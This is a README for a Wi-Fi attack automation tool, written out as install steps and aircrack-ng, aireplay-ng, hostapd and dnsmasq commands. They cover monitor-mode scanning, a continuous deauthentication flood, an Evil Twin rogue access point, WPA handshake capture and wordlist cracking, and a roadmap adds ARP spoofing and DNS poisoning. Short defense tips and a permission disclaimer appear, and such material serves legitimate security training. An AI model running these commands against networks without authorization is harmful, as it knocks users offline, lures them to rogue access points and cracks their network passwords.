This tool allows you to automate Wi-Fi attacks such as Deauthentication, Evil Twin, and WPA Handshake Capture in Kali Linux, and enables Wi-Fi scanning and learning features in Windows PowerShell. Perfect for cybersecurity students and professionals!
π¨ Disclaimer: This tool is for educational purposes only. Always get permission from network owners before conducting any attacks.
- π΅οΈ Network Scanning: Identify nearby Wi-Fi networks.
- π« Deauthentication Attack: Disconnect all clients from a target network.
- π Evil Twin Attack: Set up a rogue Wi-Fi access point.
- π‘ WPA Handshake Capture: Capture handshakes for offline cracking.
- π‘οΈ Defense Tips: Learn how to defend your network against attacks.
- π΅οΈ Wi-Fi Scanning: View available Wi-Fi networks.
- π‘οΈ Defense Tips: Learn about Wi-Fi security best practices.
- π Educational Features: Gain insights into different types of Wi-Fi attacks and how they work.
Ensure you have all necessary tools installed:
sudo apt-get install aircrack-ng hostapd dnsmasq
git clone https://github.com/Danyalkhattak/wifi-attack-tool.git
cd wifi-attack-tool
pip install -r requirements.txt
sudo python3 main.py
For Windows PowerShell, you can clone the repository by running:
git clone https://github.com/Danyalkhattak/wifi-attack-tool.git
cd wifi-attack-tool
You may need to install some PowerShell modules:
Install-Module -Name WiFiProfileManagement
You can also use built-in cmdlets for simple network scanning.
.\main.ps1
- Run the network scanning module to view nearby Wi-Fi networks:
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
- Scan for available Wi-Fi networks:
netsh wlan show networks
-
Deauthentication Attack:
- Disconnect clients from a target network:
sudo airmon-ng start wlan0 <channel> sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon
- Disconnect clients from a target network:
-
Evil Twin Attack:
- Create a fake access point:
sudo hostapd -B /etc/hostapd.conf sudo dnsmasq -C /etc/dnsmasq.conf
- Create a fake access point:
-
WPA Handshake Capture:
- Capture a WPA handshake:
sudo airodump-ng --bssid <BSSID> --channel <channel> -w <output> wlan0mon
- Capture a WPA handshake:
-
Crack WPA Handshake:
- Crack the captured WPA handshake using a wordlist:
sudo aircrack-ng <handshake.cap> -w /usr/share/wordlists/rockyou.txt
- Crack the captured WPA handshake using a wordlist:
After simulating attacks, learn how to protect your network:
- Use WPA3 encryption for enhanced security.
- Disable WPS (Wi-Fi Protected Setup).
- Enable 802.11w to protect management frames.
- Set a strong and unique Wi-Fi password.
- Regularly monitor your network for suspicious devices.
In Windows PowerShell, this tool provides insights and educational examples on common Wi-Fi attacks. It includes:
- Wi-Fi Scanning: View the available Wi-Fi networks around you.
- Attack Simulations: Learn how attacks like Deauthentication and Evil Twin work (educational only).
- Defense Tips: Understand how to protect your network against common attacks.
Follow me on Instagram or support my work by buying me a coffee!
-
Start your Wi-Fi adapter in monitoring mode:
sudo airmon-ng start wlan0
-
Scan networks in range:
sudo airodump-ng wlan0mon
- Run the following command to view available networks:
netsh wlan show networks
- WPA3: Use WPA3 encryption for the strongest security.
- MAC Filtering: Limit which devices can connect to your Wi-Fi based on their MAC address.
- Disable WPS: Turn off WPS in your router settings to prevent brute-force attacks.
- Add ARP Spoofing and DNS Poisoning attacks.
- Implement a GUI for both Windows and Linux.
- Add support for advanced password cracking options.
This tool is for ethical hacking and educational purposes only. Do not use it on networks you do not own or have permission to test.